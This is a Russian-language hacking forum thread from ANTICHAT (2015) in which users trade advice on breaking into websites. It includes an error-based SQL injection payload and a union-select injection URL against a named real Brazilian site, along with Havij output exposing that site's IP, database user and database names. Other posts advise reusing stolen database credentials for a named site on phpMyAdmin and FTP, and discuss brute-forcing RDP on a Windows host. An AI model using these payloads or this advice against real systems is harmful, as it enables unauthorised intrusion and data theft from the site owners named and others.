ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.10.2015, 00:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
7285
Репутация:
0
|
|
ХЕЛП
если
Код:
Code:
'and extractvalue(null,concat(0x3a,(select concat(mid(КОЛОНКА,1,64)) from ТАБЛИЦА limit 0,1)))='
то
You can't specify target table ' ТАБЛИЦА' for update in FROM clause |
|
|
|
02.10.2015, 00:48
|
|
Новичок
Регистрация: 28.02.2010
Сообщений: 5
Провел на форуме:
20360
Репутация:
0
|
|
[DEL 39]
|
|
|
02.10.2015, 00:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
7285
Репутация:
0
|
|
Сообщение от cheebeez
cheebeez said:
↑
Говорит, что нельзя делать одновременно апдэйт и селект к одной колонке. Опечатался,
You can't specify target table ' ТАБЛИЦА' for update in FROM clause
|
|
|
|
02.10.2015, 16:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от SaNDER
SaNDER said:
↑
тебе уже ответили .
------------------------------------------------------------
Мой вопрос .
Где находится админка по адреcсу good-steam.ru ?
P.S просто у меня вот это есть
Код:
Code:
Полюбому к админке .
это настройки для подключения к бд
|
|
|
|
02.10.2015, 17:59
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от SaNDER
SaNDER said:
↑
И что мне это не как не пригодится? . ищи интерфейс для подключения к БД (PMA, Adminer, etc), или попробуй подключиться удаленно. так же пробуй эти данные к другим сервисам, например FTP (бывает что совпадают)
|
|
|
|
03.10.2015, 01:42
|
|
Новичок
Регистрация: 28.02.2010
Сообщений: 5
Провел на форуме:
20360
Репутация:
0
|
|
[DEL 52]
|
|
|
|
04.10.2015, 18:30
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
Здравствуйте, имеется компьютер на windows xp (другой есть на windows server 2012), на нем есть RDP, netBios. Получить в NetBios список ресурсов получилось лишь пользовательский, хотя xSpider смог получить все:
сборник - пользовательский
IPC$ (Удаленный IPC) - pipe по умолчанию
D$ (Стандартный общий ресурс) - диск по умолчанию
ADMIN$ (Удаленный Admin) - диск по умолчанию
C$ (Стандартный общий ресурс) - диск по умолчанию
Подключается лишь к сборнику. Остальное - не получается null login не работает.
Получил список пользователей, я так понял netBios имена, это пользователи windows, вопрос, теперь только брутом RDP брать? Нет ли каких уязвимостей? Поиском особо ничего не нашел. По данной теме. Может еще есть советы по netBios
|
|
|
|
05.10.2015, 09:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
11344
Репутация:
5
|
|
Сообщение от SaNDER
SaNDER said:
↑
Не проще ли заинжектить прогой,хэвидж всё вывел .
Код:
Code:
Target: http://www.fimca.com.br/pagina.asp?id=-11%20union%20select%201,2,3,concat_ws%280x3a,table_name,column_name%29,5,6%20from%20information_schema.columns
Host IP: 191.252.45.189
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL
Resp. Time(avg): 7342 ms
Current User: fimca@191.252.45.189
Sql Version: 5.1.54-rel12.6-log
Current DB: fimca
System User: fimca@191.252.45.189
Host Name: hm7092
Installation dir: /usr/
DB User: 'fimca'@'%'
Data Bases: information_schema
fimca
Админка в /admin,но без нужных прав не пустят(403 Forbbiden) . Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
UPD. Закрыто, ниже frank ответил.
|
|
|
|
05.10.2015, 11:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
Сообщение от AlexG
AlexG said:
↑
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
|
|
|
|
05.10.2015, 11:48
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от AlexG
AlexG said:
↑
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
UPD. Закрыто, ниже frank ответил.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
